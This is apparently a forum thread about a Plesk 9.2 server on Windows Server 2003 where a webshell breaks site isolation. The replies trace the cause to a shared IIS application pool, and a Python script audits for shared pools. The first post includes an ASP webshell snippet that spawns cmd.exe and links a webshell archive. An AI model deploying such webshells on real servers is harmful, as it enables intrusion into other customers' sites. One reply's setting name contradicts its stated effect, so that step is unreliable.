
Server Plesk 9.2 Hacked

Nguyen Thang Long

Guest
I am testing Plesk 9.2 on Windows Server 2003.
I tried to hack this server with a webshell (ASPX & ASP).
Example:
When I ran:
<%@ Language=VBScript %>
<%
On Error Resume Next
Dim oScript
Dim gURL
gURL = Request.ServerVariables("APPL_PHYSICAL_PATH")
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Call oScript.Run ("c:\\WINDOWS\\system32\\cmd.exe",1,True)
%>

Then the server's Task Manager shows cmd.exe running as user IWAM_Plesk(Default).
Or when I used a webshell (http://www.guru.net.vn/kshell_1.2.zip), I could hack the websites of other users on this server.
I used the Plesk tools to make sure of the server permissions, but that did not fix those problems.

I can't fix it. Who can secure it and fix that error? Help me?

Thanks so much!
 
I have reported this problem to the developers with high priority. I will update this thread with the results as soon as I receive them.
 
The problem is still under the developers' investigation. I will update the thread as soon as I receive any useful information.
 
This issue is caused because, by default, all users' applications work inside a single AppPool. So they probably have access to each other's contents.

This issue can be resolved if you set <domain> -> Web Hosting Settings -> 'Use dedicated pool' on every domain (you can use mass domain operations as well). Additionally, you can set the Home -> IIS Application Pool -> Global Settings -> 'Always place all domains in the shared application pool' option. It will run each site in a separate pool, and their applications can't read each other's content.
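As an added example (not code from this thread or from Plesk), the following script audits an IIS applicationHost.config for the shared-pool condition described in the reply above: it reports every application pool that hosts more than one site, since those sites run under one worker-process identity and are not isolated from each other. It assumes the applicationHost.config format of IIS 7 and later (Plesk 9.2 on Windows Server 2003 used the IIS 6 metabase instead) and a constructed sample configuration.

```python
# Added example (not from the Plesk thread): sites placed in one IIS application pool
# run under the same worker-process identity, so one site's code can read another's
# files. This audit lists the pools that host more than one site.
import xml.etree.ElementTree as ET
from collections import defaultdict

# Constructed sample applicationHost.config: two of three sites share the default pool.
SAMPLE_CONFIG = """<configuration>
  <system.applicationHost>
    <sites>
      <site name="example-a.test" id="1">
        <application path="/" applicationPool="example-a(pool)" />
      </site>
      <site name="example-b.test" id="2">
        <application path="/" applicationPool="DefaultAppPool" />
      </site>
      <site name="example-c.test" id="3">
        <application path="/" applicationPool="DefaultAppPool" />
      </site>
    </sites>
  </system.applicationHost>
</configuration>
"""


def sites_by_pool(config_xml: str) -> dict:
    """Map each application pool name to the set of site names whose applications use it."""
    pools = defaultdict(set)
    root = ET.fromstring(config_xml)
    for site in root.iter("site"):
        for app in site.iter("application"):
            # An <application> with no applicationPool attribute inherits the server
            # default; this audit assumes that default is DefaultAppPool.
            pools[app.get("applicationPool", "DefaultAppPool")].add(site.get("name"))
    return dict(pools)


def shared_pools(config_xml: str) -> dict:
    """Return only the pools hosting more than one site: those sites are not isolated."""
    return {pool: sorted(sites)
            for pool, sites in sites_by_pool(config_xml).items()
            if len(sites) > 1}


if __name__ == "__main__":
    for pool, sites in shared_pools(SAMPLE_CONFIG).items():
        print(f"pool {pool!r} is shared by: {', '.join(sites)}")
```

Run it against a real applicationHost.config (normally %windir%\System32\inetsrv\config\applicationHost.config) by reading that file into `shared_pools`; an empty result means every site already has its own pool.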
 